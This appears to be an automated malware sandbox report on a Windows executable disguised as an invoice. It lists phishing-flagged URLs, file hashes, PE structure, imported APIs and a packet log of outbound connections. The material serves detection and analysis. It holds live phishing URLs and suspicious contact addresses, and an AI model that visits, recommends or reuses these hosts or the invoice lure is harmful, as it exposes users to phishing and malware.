                            • 38.54.26.75
                            http://aprackspace.serveusers.com/Get hashmaliciousUnknownBrowse
                            • 143.244.221.78
                            https://telegram.tikkf.top/Get hashmaliciousUnknownBrowse
                            • 38.45.123.42
                            http://rmdown.newrenminbankcn.cc/Get hashmaliciousUnknownBrowse
                            • 149.104.35.171
                            http://pldw.peoplebankweb.cc/Get hashmaliciousUnknownBrowse
                            • 149.104.35.171
                            http://web.teleglams.top/Get hashmaliciousUnknownBrowse
                            • 154.44.30.138
                            AMAZONEXPANSIONGBhttp://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 52.223.40.198
                            http://home-101829.weeblysite.com/Get hashmaliciousUnknownBrowse
                            • 52.223.40.198
                            http://sky-102142.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 52.223.40.198
                            http://bt-109018.weeblysite.com/Get hashmaliciousUnknownBrowse
                            • 52.223.40.198
                            http://shaw-107439.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 52.223.40.198
                            https://bt-106726.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 52.223.40.198
                            https://btyxqgg107999.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 3.33.220.150
                            https://btinternet-108597.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 52.223.40.198
                            https://hk668.cc/Get hashmaliciousUnknownBrowse
                            • 3.33.165.22
                            https://shaw-104990.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 52.223.40.198
                            MICROSOFT-CORP-MSN-AS-BLOCKUShttp://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            http://www.ysb238.cc/Get hashmaliciousUnknownBrowse
                            • 20.239.97.157
                            http://home-101829.weeblysite.com/Get hashmaliciousUnknownBrowse
                            • 150.171.27.10
                            http://sky-102142.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            http://bt-109018.weeblysite.com/Get hashmaliciousUnknownBrowse
                            • 150.171.28.10
                            http://shaw-107439.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            https://bt-106726.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            https://btinternet-102233.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            http://currentlyatt49009new.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            https://btyxqgg107999.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 150.171.28.10
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\replace.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.121297215059106
                            Encrypted:false
                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                            MD5:D87270D0039ED3A5A72E7082EA71E305
                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\Revised Invoice H000127896.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):287232
                            Entropy (8bit):7.993932084278217
                            Encrypted:true
                            SSDEEP:6144:QNOEaaVVZbXp0w8K2ICbwF5pNWhSEZhnHrJj/CG301AmVcUggR:sIaVVZtCZ25f25HHg8/mVpggR
                            MD5:721D8CDD5E81BBB8594BA631D86D7220
                            SHA1:739CFE60A6320736B28DCC21D92A7A68D3888521
                            SHA-256:F728B6518839BE49AEC234D5A08AED26C5AC56FF7C6D1F73C5D6A685558B5CA6
                            SHA-512:6805FD90FB939C8CD82F2CF98C529C01AF79A96A57A57B8F05E0E5522E8219F63037A2F8B21A0482927FAE422DA5855AEA33F0FA455668ED2F8CCC620F7B720D
                            Malicious:false
                            Reputation:low
                            Preview:.....Z8KJ..E..s.HK...F\...JIJYLPKISOLHHWJVWETZ8KJIJYLPKI.OLHFH.XW.]...K..x.8":s?>'/%+;w&54V$>i(<l">'s&"h...v:*0?.FGCnYLPKISO5IA.w60.i:_.w)-.V..i/+.R..k%3."..v9+.. 0'q(/.JVWETZ8K..JY.QJI)...HWJVWETZ.KHHAXGPK.WOLHHWJVWE.N8KJYJYL0OISO.HHGJVWGTZ>KJIJYLPMISOLHHWJ6SETX8KJIJYNP..SO\HHGJVWEDZ8[JIJYLP[ISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPe=678HHW..SETJ8KJ.NYL@KISOLHHWJVWETZ.KJ)JYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJI
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.506811506149916
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:Revised Invoice H000127896.exe
                            File size:1'379'361 bytes
                            MD5:2a489cab1a6113a0f082d8bfee40ead9
                            SHA1:9d422436b62b0afc1c4a24295940ef93724a1580
                            SHA256:3f92b6ed5e7ebacc4f0039ca5fcbdd19d4690ca3fd0b73dc2c9e2df580669e6f
                            SHA512:34f0097329404c11d6858f04a96f52eed399842d27885d38e89fb46ad2df9602854eec068adc6681bc61715468fe12a5cc741cf17cc8300685235214d781dd96
                            SSDEEP:24576:/RmJkcoQricOIQxiZY1iaIIJn2MjD6cjfB8tAq3LhWcTh5b6rTUd97SX:UJZoQrbTFZY1iaIKTv6cDYAzcNt6sd9E
                            TLSH:AE55D013B5CD813DC2A326B1BE7AF37596386F270326D19737C8AD2D1E601492B257E2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                            Icon Hash:24ed8d96b2ade832
                            Entrypoint:0x4165c1
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                            Instruction
                            call 00007FBA38CE986Bh
                            jmp 00007FBA38CE06DEh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push edi
                            push esi
                            mov esi, dword ptr [ebp+0Ch]
                            mov ecx, dword ptr [ebp+10h]
                            mov edi, dword ptr [ebp+08h]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007FBA38CE085Ah
                            cmp edi, eax
                            jc 00007FBA38CE09F6h
                            cmp ecx, 00000080h
                            jc 00007FBA38CE086Eh
                            cmp dword ptr [004A9724h], 00000000h
                            je 00007FBA38CE0865h
                            push edi
                            push esi
                            and edi, 0Fh
                            and esi, 0Fh
                            cmp edi, esi
                            pop esi
                            pop edi
                            jne 00007FBA38CE0857h
                            jmp 00007FBA38CE0C32h
                            test edi, 00000003h
                            jne 00007FBA38CE0866h
                            shr ecx, 02h
                            and edx, 03h
                            cmp ecx, 08h
                            jc 00007FBA38CE087Bh
                            rep movsd
                            jmp dword ptr [00416740h+edx*4]
                            mov eax, edi
                            mov edx, 00000003h
                            sub ecx, 04h
                            jc 00007FBA38CE085Eh
                            and eax, 03h
                            add ecx, eax
                            jmp dword ptr [00416654h+eax*4]
                            jmp dword ptr [00416750h+ecx*4]
                            nop
                            jmp dword ptr [004166D4h+ecx*4]
                            nop
                            inc cx
                            add byte ptr [eax-4BFFBE9Ah], dl
                            inc cx
                            add byte ptr [ebx], ah
                            ror dword ptr [edx-75F877FAh], 1
                            inc esi
                            add dword ptr [eax+468A0147h], ecx
                            add al, cl
                            jmp 00007FBA3B159057h
                            add esi, 03h
                            add edi, 03h
                            cmp ecx, 08h
                            jc 00007FBA38CE081Eh
                            rep movsd
                            jmp dword ptr [00000000h+edx*4]
                            Programming Language:
                            • [ C ] VS2010 SP1 build 40219
                            • [C++] VS2010 SP1 build 40219
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2010 SP1 build 40219
                            • [RES] VS2010 SP1 build 40219
                            • [LNK] VS2010 SP1 build 40219
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x10178.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0xab0000x101780x10200f815ae6916a7f0ea50892f76abc60926False0.11670300387596899data4.051633659343264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                            RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                            RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                            RT_ICON0xab7c00xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/mEnglishGreat Britain0.07864312267657993
                            RT_MENU0xb89e80x50dataEnglishGreat Britain0.9
                            RT_DIALOG0xb8a380xfcdataEnglishGreat Britain0.6507936507936508
                            RT_STRING0xb8b380x530dataEnglishGreat Britain0.33960843373493976
                            RT_STRING0xb90680x690dataEnglishGreat Britain0.26964285714285713
                            RT_STRING0xb96f80x4d0dataEnglishGreat Britain0.36363636363636365
                            RT_STRING0xb9bc80x5fcdataEnglishGreat Britain0.3087467362924282
                            RT_STRING0xba1c80x65cdataEnglishGreat Britain0.34336609336609336
                            RT_STRING0xba8280x388dataEnglishGreat Britain0.377212389380531
                            RT_STRING0xbabb00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                            RT_GROUP_ICON0xbad080x14dataEnglishGreat Britain1.25
                            RT_GROUP_ICON0xbad200x14dataEnglishGreat Britain1.15
                            RT_GROUP_ICON0xbad380x14dataEnglishGreat Britain1.25
                            RT_GROUP_ICON0xbad500x14dataEnglishGreat Britain1.25
                            RT_VERSION0xbad680x19cdataEnglishGreat Britain0.5339805825242718
                            RT_MANIFEST0xbaf080x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                            DLLImport
                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                            Language of compilation systemCountry where language is spokenMap
                            EnglishGreat Britain
                            EnglishUnited States
                            TimestampSource PortDest PortSource IPDest IP
                            Sep 27, 2024 09:07:57.331830978 CEST4971280192.168.2.53.33.130.190
                            Sep 27, 2024 09:07:57.336766005 CEST80497123.33.130.190192.168.2.5
                            Sep 27, 2024 09:07:57.336858988 CEST4971280192.168.2.53.33.130.190
                            Sep 27, 2024 09:07:57.344508886 CEST4971280192.168.2.53.33.130.190
                            Sep 27, 2024 09:07:57.349550009 CEST80497123.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:04.850677967 CEST80497123.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:04.850732088 CEST80497123.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:04.850842953 CEST4971280192.168.2.53.33.130.190
                            Sep 27, 2024 09:08:04.854033947 CEST4971280192.168.2.53.33.130.190
                            Sep 27, 2024 09:08:04.858864069 CEST80497123.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:15.043430090 CEST4971380192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:15.048309088 CEST8049713217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:15.048403025 CEST4971380192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:15.103463888 CEST4971380192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:15.108426094 CEST8049713217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:15.712882996 CEST8049713217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:15.712937117 CEST8049713217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:15.712970972 CEST8049713217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:15.713006973 CEST4971380192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:15.713103056 CEST4971380192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:16.615341902 CEST4971380192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:17.633871078 CEST4971480192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:17.638897896 CEST8049714217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:17.638992071 CEST4971480192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:17.647696972 CEST4971480192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:17.652945042 CEST8049714217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:18.277955055 CEST8049714217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:18.277988911 CEST8049714217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:18.278007984 CEST8049714217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:18.278104067 CEST4971480192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:19.162240028 CEST4971480192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:20.182043076 CEST4971580192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:20.365098000 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:20.365370035 CEST4971580192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:20.421360016 CEST4971580192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:20.426496983 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:20.426603079 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:21.110012054 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:21.110044003 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:21.110070944 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:21.110096931 CEST8049715217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:21.110120058 CEST4971580192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:21.110165119 CEST4971580192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:21.927805901 CEST4971580192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:22.946525097 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:22.951512098 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:22.951589108 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:22.961647987 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:22.966849089 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600423098 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600482941 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600519896 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600550890 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600558996 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:23.600586891 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600657940 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:23.600786924 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:23.600846052 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:23.604415894 CEST4971680192.168.2.5217.160.0.27
                            Sep 27, 2024 09:08:23.609226942 CEST8049716217.160.0.27192.168.2.5
                            Sep 27, 2024 09:08:31.210853100 CEST4971780192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:31.215729952 CEST804971720.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:31.215806007 CEST4971780192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:31.226924896 CEST4971780192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:31.231828928 CEST804971720.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:32.105614901 CEST804971720.2.217.253192.168.2.5
